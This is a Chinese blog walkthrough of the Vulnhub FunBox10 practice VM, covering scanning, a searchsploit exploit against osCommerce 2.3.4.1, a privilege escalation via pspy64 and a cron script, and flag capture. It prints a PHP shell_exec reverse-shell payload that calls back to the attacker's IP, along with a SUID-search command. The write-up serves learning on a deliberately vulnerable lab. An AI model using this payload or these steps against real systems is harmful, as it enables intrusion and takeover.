Vulnhub靶机FunBox10(Under Construction)渗透测试详解
Vulnhub靶机介绍:
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。
老样子需要找到flag即可。
Vulnhub靶机下载:
https://download.vulnhub.com/funbox/Funbox10.ova/
Vulnhub靶机安装:
下载好了把安装包解压 然后导入Oracle VM
打开即可。
![在这里插入图片描述](https://img-blog.csdnimg.cn/58290d1787c643ce9749e1ba294c6f23.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/09ec851737d740f1b0bc2b727c40b4a5.png)
Vulnhub靶机漏洞详解:
①:信息收集:
kali里使用netdiscover
发现主机
![在这里插入图片描述](https://img-blog.csdnimg.cn/ac94ec7dcc7c4bb2a72a15bb37d2ea62.png)
渗透机:kali IP :172.16.5.117 靶机IP :172.16.5.108
ping
的通 环境搭建成功!
![在这里插入图片描述](https://img-blog.csdnimg.cn/a0b7936781d8442c9895c5af54d1b27d.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/9ec504303c1945b888dbc71c8d53c8cc.png)
通过nmap
扫描发现开启了22,25
和80,110,143
端口 访问80
端口 简单dirb
扫描一下
![在这里插入图片描述](https://img-blog.csdnimg.cn/7174241e84404824a62a80b6e165fd94.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/4ac4bb7c93dd446fa1120a7c8c824e26.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/acd1f58fdd6245f8b30672085bca7b65.png)
②:漏洞利用:
查看相关漏洞:searchsploit osCommerce 2.3.4.1
发现了 44374.py
进行漏洞利用。
![在这里插入图片描述](https://img-blog.csdnimg.cn/880419ec99bc4a50bf51a84aed0455bd.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/6c0df6320a1143bf876b04f16cd23143.png)
'shell_exec("bash -c \'bash -i >& /dev/tcp/172.16.5.17/7777 0>&1\'");'
![在这里插入图片描述](https://img-blog.csdnimg.cn/d3c3c8bb844f4145a92231bdbcfb1a07.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/8ccce586da0548b58383838eb288e287.png)
这里的话就回弹成功了 但是权限比较低!!!
③:pspy64提权:
使用命令:find / -perm -4000 -exec ls -al {} \; 2>/dev/null
发现没有可以利用的sudo
提权
![在这里插入图片描述](https://img-blog.csdnimg.cn/c0cb6720403c4d8e8a133e5e5e2fba22.png)
需要上传一个pspy64s
scp
发现有这个命令(kali
要开启ssh
服务 和配置文件设置好 不然不行!!) 下载成功!!
scp root@172.16.5.17:/var/www/html/pspy64 .
![在这里插入图片描述](https://img-blog.csdnimg.cn/8212548b61af4cae9acb32de05505b54.png)
给个权限: chmod 777 pspy64
然后运行 ./pspy64
发现了一个 UID=1000 cron.sh
进行查看
![在这里插入图片描述](https://img-blog.csdnimg.cn/f01e71f1403c42529b468d85ec4da4a3.png)
![在这里插入图片描述](https://img-blog.csdnimg.cn/2a50ae63fe7e4a01a00bed5ed8d3945c.png)
Base64解码:http://www.jsons.cn/base64
![在这里插入图片描述](https://img-blog.csdnimg.cn/b5281c3a5b2c49428d4dbd72557738b6.png)
得到了root 账号的密码 直接登入即可!!!
④:获取flag:
![在这里插入图片描述](https://img-blog.csdnimg.cn/0dc44c474f9c441d9d5766244349990c.png)
至此获取到了所有得flag,渗透测试结束。
Vulnhub靶机渗透总结:
FunBox
系列第十个靶机了 这个靶机比较简单
1.信息收集 获取ip地址 和端口信息
2. searchsploit
使用 然后进行漏洞的利用
3. pspy64
提权
这是这个系列第十个靶机啦 比较简单 希望对刚入门得小白有帮助! 后续会把这个系列更新完!
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)